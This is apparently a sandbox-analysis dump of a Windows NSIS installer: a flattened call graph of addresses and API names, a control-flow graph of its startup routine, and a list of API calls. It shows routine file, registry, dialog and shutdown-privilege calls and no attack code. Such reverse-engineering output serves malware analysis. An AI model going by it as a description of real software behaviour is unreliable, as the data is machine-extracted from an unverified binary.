3327->3333 3331 40178f 3332 4061c1 2 API calls 3331->3332 3332->3331 3334 402dd7 3333->3334 3335 4066df 21 API calls 3334->3335 3336 402df8 3335->3336 3337 401788 3336->3337 3338 406950 5 API calls 3336->3338 3339 4061c1 3337->3339 3338->3337 3340 4061ce GetTickCount GetTempFileNameW 3339->3340 3341 406208 3340->3341 3342 406204 3340->3342 3341->3331 3342->3340 3342->3341 3343 403c82 3344 403c93 CloseHandle 3343->3344 3345 403c9d 3343->3345 3344->3345 3346 403cb1 3345->3346 3347 403ca7 CloseHandle 3345->3347 3352 403cdf 3346->3352 3347->3346 3353 403ced 3352->3353 3354 403cb6 3353->3354 3355 403cf2 FreeLibrary GlobalFree 3353->3355 3356 405dae 3354->3356 3355->3354 3355->3355 3392 406079 3356->3392 3359 405dd6 DeleteFileW 3366 403cc2 3359->3366 3360 405f0d 3360->3366 3435 4069ff FindFirstFileW 3360->3435 3361 405ded 3361->3360 3406 4066a2 lstrcpynW 3361->3406 3363 405e13 3364 405e26 3363->3364 3365 405e19 lstrcatW 3363->3365 3407 405fbd lstrlenW 3364->3407 3367 405e2c 3365->3367 3370 405e3c lstrcatW 3367->3370 3372 405e47 lstrlenW FindFirstFileW 3367->3372 3370->3372 3372->3360 3390 405e69 3372->3390 3375 405ef0 FindNextFileW 3378 405f06 FindClose 3375->3378 3375->3390 3376 405d66 5 API calls 3379 405f48 3376->3379 3378->3360 3380 405f62 3379->3380 3381 405f4c 3379->3381 3383 405727 28 API calls 3380->3383 3381->3366 3384 405727 28 API calls 3381->3384 3383->3366 3386 405f59 3384->3386 3385 405dae 64 API calls 3385->3390 3387 406462 40 API calls 3386->3387 3387->3366 3388 405727 28 API calls 3388->3375 3390->3375 3390->3385 3390->3388 3411 4066a2 lstrcpynW 3390->3411 3412 405d66 3390->3412 3420 405727 3390->3420 3431 406462 MoveFileExW 3390->3431 3441 4066a2 lstrcpynW 3392->3441 3394 40608a 3442 40601c CharNextW CharNextW 3394->3442 3397 405dce 3397->3359 3397->3361 3398 406950 5 API calls 3404 4060a0 3398->3404 3399 4060d1 lstrlenW 3400 4060dc 3399->3400 3399->3404 3401 405f71 3 API calls 3400->3401 3403 4060e1 GetFileAttributesW 3401->3403 3402 4069ff 2 API calls 3402->3404 3403->3397 3404->3397 3404->3399 3404->3402 3405 405fbd 2 API calls 3404->3405 3405->3399 3406->3363 3408 405fcb 3407->3408 3409 405fd1 CharPrevW 3408->3409 3410 405fdd 3408->3410 3409->3408 3409->3410 3410->3367 3411->3390 3448 40616d GetFileAttributesW 3412->3448 3415 405d93 3415->3390 3416 405d81 RemoveDirectoryW 3418 405d8f 3416->3418 3417 405d89 DeleteFileW 3417->3418 3418->3415 3419 405d9f SetFileAttributesW 3418->3419 3419->3415 3421 405742 3420->3421 3430 4057e4 3420->3430 3422 40575e lstrlenW 3421->3422 3423 4066df 21 API calls 3421->3423 3424 405787 3422->3424 3425 40576c lstrlenW 3422->3425 3423->3422 3426 40579a 3424->3426 3427 40578d SetWindowTextW 3424->3427 3428 40577e lstrcatW 3425->3428 3425->3430 3429 4057a0 SendMessageW SendMessageW SendMessageW 3426->3429 3426->3430 3427->3426 3428->3424 3429->3430 3430->3390 3432 406483 3431->3432 3433 406476 3431->3433 3432->3390 3451 4062e8 3433->3451 3436 405f32 3435->3436 3437 406a15 FindClose 3435->3437 3436->3366 3438 405f71 lstrlenW CharPrevW 3436->3438 3437->3436 3439 405f3c 3438->3439 3440 405f8d lstrcatW 3438->3440 3439->3376 3440->3439 3441->3394 3443 406039 3442->3443 3446 40604b 3442->3446 3445 406046 CharNextW 3443->3445 3443->3446 3444 40606f 3444->3397 3444->3398 3445->3444 3446->3444 3447 405f9e CharNextW 3446->3447 3447->3446 3449 405d72 3448->3449 3450 40617f SetFileAttributesW 3448->3450 3449->3415 3449->3416 3449->3417 3450->3449 3452 406318 3451->3452 3453 40633e GetShortPathNameW 3451->3453 3478 406192 GetFileAttributesW CreateFileW 3452->3478 3455 406353 3453->3455 3456 40645d 3453->3456 3455->3456 3457 40635b wsprintfA 3455->3457 3456->3432 3459 4066df 21 API calls 3457->3459 3458 406322 CloseHandle GetShortPathNameW 3458->3456 3460 406336 3458->3460 3461 406383 3459->3461 3460->3453 3460->3456 3479 406192 GetFileAttributesW CreateFileW 3461->3479 3463 406390 3463->3456 3464 40639f GetFileSize GlobalAlloc 3463->3464 3465 4063c1 3464->3465 3466 406456 CloseHandle 3464->3466 3480 406215 ReadFile 3465->3480 3466->3456 3471 4063e0 lstrcpyA 3474 406402 3471->3474 3472 4063f4 3473 4060f7 4 API calls 3472->3473 3473->3474 3475 406439 SetFilePointer 3474->3475 3487 406244 WriteFile 3475->3487 3478->3458 3479->3463 3481 406233 3480->3481 3481->3466 3482 4060f7 lstrlenA 3481->3482 3483 406138 lstrlenA 3482->3483 3484 406140 3483->3484 3485 406111 lstrcmpiA 3483->3485 3484->3471 3484->3472 3485->3484 3486 40612f CharNextA 3485->3486 3486->3483 3488 406262 GlobalFree 3487->3488 3488->3466 4376 401d82 4377 402da9 21 API calls 4376->4377 4378 401d93 SetWindowLongW 4377->4378 4379 402c4f 4378->4379 4380 401503 4381 401508 4380->4381 4382 40152e 4380->4382 4383 402da9 21 API calls 4381->4383 4383->4382 4384 402903 4385 40290b 4384->4385 4386 40290f FindNextFileW 4385->4386 4388 402921 4385->4388 4387 402968 4386->4387 4386->4388 4390 4066a2 lstrcpynW 4387->4390 4390->4388 4391 401588 4392 402bc9 4391->4392 4395 4065e9 wsprintfW 4392->4395 4394 402bce 4395->4394 3881 401389 3883 401390 3881->3883 3882 4013fe 3883->3882 3884 4013cb MulDiv SendMessageW 3883->3884 3884->3883 4403 40198d 4404 402da9 21 API calls 4403->4404 4405 401994 4404->4405 4406 402da9 21 API calls 4405->4406 4407 4019a1 4406->4407 4408 402dcb 21 API calls 4407->4408 4409 4019b8 lstrlenW 4408->4409 4411 4019c9 4409->4411 4410 401a0a 4411->4410 4415 4066a2 lstrcpynW 4411->4415 4413 4019fa 4413->4410 4414 4019ff lstrlenW 4413->4414 4414->4410 4415->4413 4416 40508e GetDlgItem GetDlgItem 4417 4050e0 7 API calls 4416->4417 4428 405305 4416->4428 4418 405187 DeleteObject 4417->4418 4419 40517a SendMessageW 4417->4419 4420 405190 4418->4420 4419->4418 4422 4051c7 4420->4422 4423 4066df 21 API calls 4420->4423 4421 4053e7 4425 405493 4421->4425 4431 405440 SendMessageW 4421->4431 4459 4052f8 4421->4459 4424 404621 22 API calls 4422->4424 4429 4051a9 SendMessageW SendMessageW 4423->4429 4430 4051db 4424->4430 4426 4054a5 4425->4426 4427 40549d SendMessageW 4425->4427 4439 4054b7 ImageList_Destroy 4426->4439 4440 4054be 4426->4440 4444 4054ce 4426->4444 4427->4426 4428->4421 4447 405374 4428->4447 4470 404fdc SendMessageW 4428->4470 4429->4420 4435 404621 22 API calls 4430->4435 4437 405455 SendMessageW 4431->4437 4431->4459 4432 4053d9 SendMessageW 4432->4421 4433 404688 8 API calls 4438 405694 4433->4438 4448 4051ec 4435->4448 4436 405648 4445 40565a ShowWindow GetDlgItem ShowWindow 4436->4445 4436->4459 4442 405468 4437->4442 4439->4440 4443 4054c7 GlobalFree 4440->4443 4440->4444 4441 4052c7 GetWindowLongW SetWindowLongW 4446 4052e0 4441->4446 4453 405479 SendMessageW 4442->4453 4443->4444 4444->4436 4462 405509 4444->4462 4475 40505c 4444->4475 4445->4459 4449 4052e5 ShowWindow 4446->4449 4450 4052fd 4446->4450 4447->4421 4447->4432 4448->4441 4452 40523f SendMessageW 4448->4452 4454 4052c2 4448->4454 4456 405291 SendMessageW 4448->4456 4457 40527d SendMessageW 4448->4457 4468 404656 SendMessageW 4449->4468 4469 404656 SendMessageW 4450->4469 4452->4448 4453->4425 4454->4441 4454->4446 4456->4448 4457->4448 4459->4433 4460 405613 4461 40561e InvalidateRect 4460->4461 4464 40562a 4460->4464 4461->4464 4463 405537 SendMessageW 4462->4463 4467 40554d 4462->4467 4463->4467 4464->4436 4484 404f97 4464->4484 4466 4055c1 SendMessageW SendMessageW 4466->4467 4467->4460 4467->4466 4468->4459 4469->4428 4471 40503b SendMessageW 4470->4471 4472 404fff GetMessagePos ScreenToClient SendMessageW 4470->4472 4473 405033 4471->4473 4472->4473 4474 405038 4472->4474 4473->4447 4474->4471 4487 4066a2 lstrcpynW 4475->4487 4477 40506f 4488 4065e9 wsprintfW 4477->4488 4479 405079 4480 40140b 2 API calls 4479->4480 4481 405082 4480->4481 4489 4066a2 lstrcpynW 4481->4489 4483 405089 4483->4462 4490 404ece 4484->4490 4486 404fac 4486->4436 4487->4477 4488->4479 4489->4483 4491 404ee7 4490->4491 4492 4066df 21 API calls 4491->4492 4493 404f4b 4492->4493 4494 4066df 21 API calls 4493->4494 4495 404f56 4494->4495 4496 4066df 21 API calls 4495->4496 4497 404f6c lstrlenW wsprintfW SetDlgItemTextW 4496->4497 4497->4486 4498 40168f 4499 402dcb 21 API calls 4498->4499 4500 401695 4499->4500 4501 4069ff 2 API calls 4500->4501 4502 40169b 4501->4502 4503 402b10 4504 402da9 21 API calls 4503->4504 4506 402b16 4504->4506 4505 4066df 21 API calls 4507 402953 4505->4507 4506->4505 4506->4507 4508 402711 4509 402da9 21 API calls 4508->4509 4517 402720 4509->4517 4510 40285d 4511 40276a ReadFile 4511->4510 4511->4517 4512 406215 ReadFile 4512->4517 4513 406273 5 API calls 4513->4517 4514 4027aa MultiByteToWideChar 4514->4517 4515 40285f 4521 4065e9 wsprintfW 4515->4521 4517->4510 4517->4511 4517->4512 4517->4513 4517->4514 4517->4515 4518 4027d0 SetFilePointer MultiByteToWideChar 4517->4518 4519 402870 4517->4519 4518->4517 4519->4510 4520 402891 SetFilePointer 4519->4520 4520->4510 4521->4510 4522 404791 lstrlenW 4523 4047b0 4522->4523 4524 4047b2 WideCharToMultiByte 4522->4524 4523->4524 4525 401491 4526 405727 28 API calls 4525->4526 4527 401498 4526->4527 4528 404b12 4529 404b3e 4528->4529 4530 404b4f 4528->4530 4589 405ce6 GetDlgItemTextW 4529->4589 4531 404b5b GetDlgItem 4530->4531 4538 404bba 4530->4538 4533 404b6f 4531->4533 4537 404b83 SetWindowTextW 4533->4537 4541 40601c 4 API calls 4533->4541 4534 404c9e 4587 404e4d 4534->4587 4591 405ce6 GetDlgItemTextW 4534->4591 4535 404b49 4536 406950 5 API calls 4535->4536 4536->4530 4542 404621 22 API calls 4537->4542 4538->4534 4543 4066df 21 API calls 4538->4543 4538->4587 4540 404688 8 API calls 4545 404e61 4540->4545 4546 404b79 4541->4546 4547 404b9f 4542->4547 4548 404c2e SHBrowseForFolderW 4543->4548 4544 404cce 4549 406079 18 API calls 4544->4549 4546->4537 4553 405f71 3 API calls 4546->4553 4550 404621 22 API calls 4547->4550 4548->4534 4551 404c46 CoTaskMemFree 4548->4551 4552 404cd4 4549->4552 4554 404bad 4550->4554 4555 405f71 3 API calls 4551->4555 4592 4066a2 lstrcpynW 4552->4592 4553->4537 4590 404656 SendMessageW 4554->4590 4557 404c53 4555->4557 4560 404c8a SetDlgItemTextW 4557->4560 4564 4066df 21 API calls 4557->4564 4559 404bb3 4563 406a96 5 API calls 4559->4563 4560->4534 4561 404ceb 4562 406a96 5 API calls 4561->4562 4571 404cf2 4562->4571 4563->4538 4565 404c72 lstrcmpiW 4564->4565 4565->4560 4567 404c83 lstrcatW 4565->4567 4566 404d33 4593 4066a2 lstrcpynW 4566->4593 4567->4560 4569 404d3a 4570 40601c 4 API calls 4569->4570 4572 404d40 GetDiskFreeSpaceW 4570->4572 4571->4566 4575 405fbd 2 API calls 4571->4575 4576 404d8b 4571->4576 4574 404d64 MulDiv 4572->4574 4572->4576 4574->4576 4575->4571 4577 404dfc 4576->4577 4579 404f97 24 API calls 4576->4579 4578 404e1f 4577->4578 4580 40140b 2 API calls 4577->4580 4594 404643 EnableWindow 4578->4594 4581 404de9 4579->4581 4580->4578 4582 404dfe SetDlgItemTextW 4581->4582 4583 404dee 4581->4583 4582->4577 4585 404ece 24 API calls 4583->4585 4585->4577 4586 404e3b 4586->4587 4588 404a6b SendMessageW 4586->4588 4587->4540 4588->4587 4589->4535 4590->4559 4591->4544 4592->4561 4593->4569 4594->4586 3489 401794 3490 402dcb 21 API calls 3489->3490 3491 40179b 3490->3491 3492 4017c3 3491->3492 3493 4017bb 3491->3493 3544 4066a2 lstrcpynW 3492->3544 3543 4066a2 lstrcpynW 3493->3543 3496 4017c1 3500 406950 5 API calls 3496->3500 3497 4017ce 3498 405f71 3 API calls 3497->3498 3499 4017d4 lstrcatW 3498->3499 3499->3496 3517 4017e0 3500->3517 3501 4069ff 2 API calls 3501->3517 3502 40616d 2 API calls 3502->3517 3504 4017f2 CompareFileTime 3504->3517 3505 4018b2 3507 405727 28 API calls 3505->3507 3506 401889 3509 405727 28 API calls 3506->3509 3516 40189e 3506->3516 3508 4018bc 3507->3508 3528 403396 3508->3528 3509->3516 3510 4066a2 lstrcpynW 3510->3517 3513 4018e3 SetFileTime 3515 4018f5 CloseHandle 3513->3515 3514 4066df 21 API calls 3514->3517 3515->3516 3518 401906 3515->3518 3517->3501 3517->3502 3517->3504 3517->3505 3517->3506 3517->3510 3517->3514 3523 405d02 MessageBoxIndirectW 3517->3523 3527 406192 GetFileAttributesW CreateFileW 3517->3527 3519 40190b 3518->3519 3520 40191e 3518->3520 3521 4066df 21 API calls 3519->3521 3522 4066df 21 API calls 3520->3522 3524 401913 lstrcatW 3521->3524 3525 401926 3522->3525 3523->3517 3524->3525 3526 405d02 MessageBoxIndirectW 3525->3526 3526->3516 3527->3517 3529 4033c1 3528->3529 3530 4033a5 SetFilePointer 3528->3530 3545 40349e GetTickCount 3529->3545 3530->3529 3533 4018cf 3533->3513 3533->3515 3534 406215 ReadFile 3535 4033e1 3534->3535 3535->3533 3536 40349e 46 API calls 3535->3536 3537 4033f8 3536->3537 3537->3533 3538 403464 ReadFile 3537->3538 3540 403407 3537->3540 3538->3533 3540->3533 3541 406215 ReadFile 3540->3541 3542 406244 WriteFile 3540->3542 3541->3540 3542->3540 3543->3496 3544->3497 3546 4035f6 3545->3546 3547 4034cc 3545->3547 3548 403053 36 API calls 3546->3548 3558 40361d SetFilePointer 3547->3558 3550 4033c8 3548->3550 3550->3533 3550->3534 3551 4034d7 SetFilePointer 3555 4034fc 3551->3555 3555->3550 3556 406244 WriteFile 3555->3556 3557 4035d7 SetFilePointer 3555->3557 3559 403607 3555->3559 3562 406c11 3555->3562 3569 403053 3555->3569 3556->3555 3557->3546 3558->3551 3560 406215 ReadFile 3559->3560 3561 40361a 3560->3561 3561->3555 3563 406c36 3562->3563 3564 406c3e 3562->3564 3563->3555 3564->3563 3565 406cc5 GlobalFree 3564->3565 3566 406cce GlobalAlloc 3564->3566 3567 406d45 GlobalAlloc 3564->3567 3568 406d3c GlobalFree 3564->3568 3565->3566 3566->3563 3566->3564 3567->3563 3567->3564 3568->3567 3570 403064 3569->3570 3571 40307c 3569->3571 3572 403074 3570->3572 3573 40306d DestroyWindow 3570->3573 3574 403084 3571->3574 3575 40308c GetTickCount 3571->3575 3572->3555 3573->3572 3584 406ad2 3574->3584 3575->3572 3577 40309a 3575->3577 3578 4030a2 3577->3578 3579 4030cf CreateDialogParamW ShowWindow 3577->3579 3578->3572 3588 403037 3578->3588 3579->3572 3581 4030b0 wsprintfW 3582 405727 28 API calls 3581->3582 3583 4030cd 3582->3583 3583->3572 3585 406aef PeekMessageW 3584->3585 3586 406ae5 DispatchMessageW 3585->3586 3587 406aff 3585->3587 3586->3585 3587->3572 3589 403046 3588->3589 3590 403048 MulDiv 3588->3590 3589->3590 3590->3581 4595 401a97 4596 402da9 21 API calls 4595->4596 4597 401aa0 4596->4597 4598 402da9 21 API calls 4597->4598 4599 401a45 4598->4599 4600 401598 4601 4015b1 4600->4601 4602 4015a8 ShowWindow 4600->4602 4603 402c4f 4601->4603 4604 4015bf ShowWindow 4601->4604 4602->4601 4604->4603 4605 402419 4606 402dcb 21 API calls 4605->4606 4607 402428 4606->4607 4608 402dcb 21 API calls 4607->4608 4609 402431 4608->4609 4610 402dcb 21 API calls 4609->4610 4611 40243b GetPrivateProfileStringW 4610->4611 4612 40201b 4613 402dcb 21 API calls 4612->4613 4614 402022 4613->4614 4615 4069ff 2 API calls 4614->4615 4616 402028 4615->4616 4618 402039 4616->4618 4619 4065e9 wsprintfW 4616->4619 4619->4618 4620 40569b 4621 4056ab 4620->4621 4622 4056bf 4620->4622 4623 4056b1 4621->4623 4624 405708 4621->4624 4625 4056c7 IsWindowVisible 4622->4625 4631 4056de 4622->4631 4627 40466d SendMessageW 4623->4627 4626 40570d CallWindowProcW 4624->4626 4625->4624 4628 4056d4 4625->4628 4629 4056bb 4626->4629 4627->4629 4630 404fdc 5 API calls 4628->4630 4630->4631 4631->4626 4632 40505c 4 API calls 4631->4632 4632->4624 4633 401b9c 4634 402dcb 21 API calls 4633->4634 4635 401ba3 4634->4635 4636 402da9 21 API calls 4635->4636 4637 401bac wsprintfW 4636->4637 4638 402c4f 4637->4638 4639 40149e 4640 4023c2 4639->4640 4641 4014ac PostQuitMessage 4639->4641 4641->4640 4642 4016a0 4643 402dcb 21 API calls 4642->4643 4644 4016a7 4643->4644 4645 402dcb 21 API calls 4644->4645 4646 4016b0 4645->4646 4647 402dcb 21 API calls 4646->4647 4648 4016b9 MoveFileW 4647->4648 4649 4016cc 4648->4649 4655 4016c5 4648->4655 4651 4069ff 2 API calls 4649->4651 4652 40231b 4649->4652 4650 401423 28 API calls 4650->4652 4653 4016db 4651->4653 4653->4652 4654 406462 40 API calls 4653->4654 4654->4655 4655->4650 4656 404122 4657 40413a 4656->4657 4658 40429b 4656->4658 4657->4658 4659 404146 4657->4659 4660 4042ec 4658->4660 4661 4042ac GetDlgItem GetDlgItem 4658->4661 4663 404151 SetWindowPos 4659->4663 4664 404164 4659->4664 4662 404346 4660->4662 4670 401389 2 API calls 4660->4670 4665 404621 22 API calls 4661->4665 4666 40466d SendMessageW 4662->4666 4682 404296 4662->4682 4663->4664 4667 40416d ShowWindow 4664->4667 4668 4041af 4664->4668 4669 4042d6 SetClassLongW 4665->4669 4717 404358 4666->4717 4671 40418d GetWindowLongW 4667->4671 4694 404259 4667->4694 4672 4041b7 DestroyWindow 4668->4672 4673 4041ce 4668->4673 4674 40140b 2 API calls 4669->4674 4675 40431e 4670->4675 4677 4041a6 ShowWindow 4671->4677 4671->4694 4726 4045aa 4672->4726 4678 4041d3 SetWindowLongW 4673->4678 4679 4041e4 4673->4679 4674->4660 4675->4662 4681 404322 SendMessageW 4675->4681 4676 404688 8 API calls 4676->4682 4677->4668 4678->4682 4680 4041f0 GetDlgItem 4679->4680 4679->4694 4685 404201 SendMessageW IsWindowEnabled 4680->4685 4688 40421e 4680->4688 4681->4682 4683 40140b 2 API calls 4683->4717 4684 4045ac DestroyWindow EndDialog 4684->4726 4685->4682 4685->4688 4686 4045db ShowWindow 4686->4682 4687 4066df 21 API calls 4687->4717 4689 40422b 4688->4689 4691 404272 SendMessageW 4688->4691 4692 40423e 4688->4692 4699 404223 4688->4699 4689->4691 4689->4699 4690 404621 22 API calls 4690->4717 4691->4694 4695 404246 4692->4695 4696 40425b 4692->4696 4693 4045fa SendMessageW 4693->4694 4694->4676 4698 40140b 2 API calls 4695->4698 4697 40140b 2 API calls 4696->4697 4697->4699 4698->4699 4699->4693 4699->4694 4700 404621 22 API calls 4701 4043d3 GetDlgItem 4700->4701 4702 4043f0 ShowWindow EnableWindow 4701->4702 4703 4043e8 4701->4703 4727 404643 EnableWindow 4702->4727 4703->4702 4705 40441a EnableWindow 4710 40442e 4705->4710 4706 404433 GetSystemMenu EnableMenuItem SendMessageW 4707 404463 SendMessageW 4706->4707 4706->4710 4707->4710 4709 404103 22 API calls 4709->4710 4710->4706 4710->4709 4728 404656 SendMessageW 4710->4728 4729 4066a2 lstrcpynW 4710->4729 4712 404492 lstrlenW 4713 4066df 21 API calls 4712->4713 4714 4044a8 SetWindowTextW 4713->4714 4715 401389 2 API calls 4714->4715 4715->4717 4716 4044ec DestroyWindow 4718 404506 CreateDialogParamW 4716->4718 4716->4726 4717->4682 4717->4683 4717->4684 4717->4687 4717->4690 4717->4700 4717->4716 4719 404539 4718->4719 4718->4726 4720 404621 22 API calls 4719->4720 4721 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4720->4721 4722 401389 2 API calls 4721->4722 4723 40458a 4722->4723 4723->4682 4724 404592 ShowWindow 4723->4724 4725 40466d SendMessageW 4724->4725 4725->4726 4726->4682 4726->4686 4727->4705 4728->4710 4729->4712 4730 401a24 4731 402dcb 21 API calls 4730->4731 4732 401a2b 4731->4732 4733 402dcb 21 API calls 4732->4733 4734 401a34 4733->4734 4735 401a3b lstrcmpiW 4734->4735 4736 401a4d lstrcmpW 4734->4736 4737 401a41 4735->4737 4736->4737 4738 402324 4739 402dcb 21 API calls 4738->4739 4740 40232a 4739->4740 4741 402dcb 21 API calls 4740->4741 4742 402333 4741->4742 4743 402dcb 21 API calls 4742->4743 4744 40233c 4743->4744 4745 4069ff 2 API calls 4744->4745 4746 402345 4745->4746 4747 402356 lstrlenW lstrlenW 4746->4747 4751 402349 4746->4751 4749 405727 28 API calls 4747->4749 4748 405727 28 API calls 4752 402351 4748->4752 4750 402394 SHFileOperationW 4749->4750 4750->4751 4750->4752 4751->4748 4751->4752 4760 401da6 4761 401db9 GetDlgItem 4760->4761 4762 401dac 4760->4762 4764 401db3 4761->4764 4763 402da9 21 API calls 4762->4763 4763->4764 4765 401dfa GetClientRect LoadImageW SendMessageW 4764->4765 4766 402dcb 21 API calls 4764->4766 4768 401e58 4765->4768 4770 401e64 4765->4770 4766->4765 4769 401e5d DeleteObject 4768->4769 4768->4770 4769->4770 4771 4023a8 4772 4023c2 4771->4772 4773 4023af 4771->4773 4774 4066df 21 API calls 4773->4774 4775 4023bc 4774->4775 4776 405d02 MessageBoxIndirectW 4775->4776 4776->4772 4777 402c2a SendMessageW 4778 402c44 InvalidateRect 4777->4778 4779 402c4f 4777->4779 4778->4779 4780 4024af 4781 402dcb 21 API calls 4780->4781 4782 4024c1 4781->4782 4783 402dcb 21 API calls 4782->4783 4784 4024cb 4783->4784 4797 402e5b 4784->4797 4787 402953 4788 402503 4790 40250f 4788->4790 4792 402da9 21 API calls 4788->4792 4789 402dcb 21 API calls 4791 4024f9 lstrlenW 4789->4791 4793 40252e RegSetValueExW 4790->4793 4795 403396 48 API calls 4790->4795 4791->4788 4792->4790 4794 402544 RegCloseKey 4793->4794 4794->4787 4795->4793 4798 402e76 4797->4798 4801 40653d 4798->4801 4802 40654c 4801->4802 4803 4024db 4802->4803 4804 406557 RegCreateKeyExW 4802->4804 4803->4787 4803->4788 4803->4789 4804->4803 4805 402930 4806 402dcb 21 API calls 4805->4806 4807 402937 FindFirstFileW 4806->4807 4808 40295f 4807->4808 4812 40294a 4807->4812 4809 402968 4808->4809 4813 4065e9 wsprintfW 4808->4813 4814 4066a2 lstrcpynW 4809->4814 4813->4809 4814->4812 4815 401931 4816 401968 4815->4816 4817 402dcb 21 API calls 4816->4817 4818 40196d 4817->4818 4819 405dae 71 API calls 4818->4819 4820 401976 4819->4820 4821 403d32 4822 403d3d 4821->4822 4823 403d41 4822->4823 4824 403d44 GlobalAlloc 4822->4824 4824->4823 4832 401934 4833 402dcb 21 API calls 4832->4833 4834 40193b 4833->4834 4835 405d02 MessageBoxIndirectW 4834->4835 4836 401944 4835->4836 4837 4028b6 4838 4028bd 4837->4838 4839 402bce 4837->4839 4840 402da9 21 API calls 4838->4840 4841 4028c4 4840->4841 4842 4028d3 SetFilePointer 4841->4842 4842->4839 4843 4028e3 4842->4843 4845 4065e9 wsprintfW 4843->4845 4845->4839 4846 401f37 4847 402dcb 21 API calls 4846->4847 4848 401f3d 4847->4848 4849 402dcb 21 API calls 4848->4849 4850 401f46 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 401f4f 4851->4852 4853 402dcb 21 API calls 4852->4853 4854 401f58 4853->4854 4855 401423 28 API calls 4854->4855 4856 401f5f 4855->4856 4863 405cc8 ShellExecuteExW 4856->4863 4858 401fa7 4859 406b41 5 API calls 4858->4859 4860 402953 4858->4860 4861 401fc4 CloseHandle 4859->4861 4861->4860 4863->4858 4864 402fb8 4865 402fca SetTimer 4864->4865 4867 402fe3 4864->4867 4865->4867 4866 403031 4867->4866 4868 403037 MulDiv 4867->4868 4869 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 4868->4869 4869->4866 4871 4014b8 4872 4014be 4871->4872 4873 401389 2 API calls 4872->4873 4874 4014c6 4873->4874 4875 401d3c 4876 402da9 21 API calls 4875->4876 4877 401d42 IsWindow 4876->4877 4878 401a45 4877->4878

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 25 403794 21->25 25->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 38 403839-40383e 35->38 39 40383f-403843 35->39 36->35 36->36 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->44 45 4039a9-4039c3 DeleteFileW call 4030f5 37->45 38->39 42 403904-403913 call 405f9e 39->42 43 403849-40384f 39->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 ExitProcess CoUninitialize 45->66 67 4039c9-4039cf 45->67 52 40385a-40385d 47->52 53 40385f 47->53 54 4038a4-4038a9 48->54 55 4038bf-4038f9 48->55 52->48 52->53 53->48 54->55 56 4038ab-4038b3 54->56 58 403901-403903 55->58 59 4038fb-4038ff 55->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->55 62->63 63->55 64->45 64->66 65->37 69 403bc2-403bd2 call 405d02 ExitProcess 66->69 70 403be6-403bec 66->70 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 77 403c6a-403c72 70->77 78 403bee-403c04 GetCurrentProcess OpenProcessToken 70->78 88 4039e2-403a17 71->88 89 403a2e-403a38 71->89 86 403a74-403a78 72->86 80 403c74 77->80 81 403c78-403c7c ExitProcess 77->81 84 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403c3a-403c48 call 406a96 78->85 80->81 84->85 97 403c56-403c61 ExitWindowsEx 85->97 98 403c4a-403c54 85->98 86->66 93 403a19-403a1d 88->93 91 403a3a-403a48 call 406079 89->91 92 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 89->92 91->66 107 403a4e-403a64 call 4066a2 * 2 91->107 110 403ab4-403acc 92->110 111 403aa5-403aaf call 4066a2 92->111 95 403a26-403a2a 93->95 96 403a1f-403a24 93->96 95->93 101 403a2c 95->101 96->95 96->101 97->77 102 403c63-403c65 call 40140b 97->102 98->97 98->102 101->89 102->77 107->72 114 403ad1-403ad5 110->114 111->110 116 403ada-403b04 wsprintfW call 4066df 114->116 120 403b06-403b0b call 405bf6 116->120 121 403b0d call 405c50 116->121 124 403b12-403b14 120->124 121->124 126 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 124->126 127 403b16-403b20 GetFileAttributesW 124->127 135 403b71-403b92 call 406462 call 4066df call 405c85 126->135 136 403bae 126->136 128 403b41-403b4c 127->128 129 403b22-403b2b DeleteFileW 127->129 128->114 132 403b4e 128->132 129->128 131 403b2d-403b3f call 405dae 129->131 131->116 131->128 132->66 144 403b94-403b9e 135->144 145 403bd8-403be4 CloseHandle 135->145 136->66 144->136 146 403ba0-403ba8 call 4069ff 144->146 145->136 146->116 146->136
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32 ref: 00403688
                                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                                                                                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                                                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                                                                                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004037A3
                                                                                                                                                                            • SHGetFileInfoW.SHELL32(00432708,00000000,?,000002B4,00000000), ref: 004037C2
                                                                                                                                                                            • GetCommandLineW.KERNEL32(00464260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                                                                                                                                            • CharNextW.USER32(00000000,004BD000,00000020,004BD000,00000000,?,00000008,0000000A,0000000C), ref: 00403810
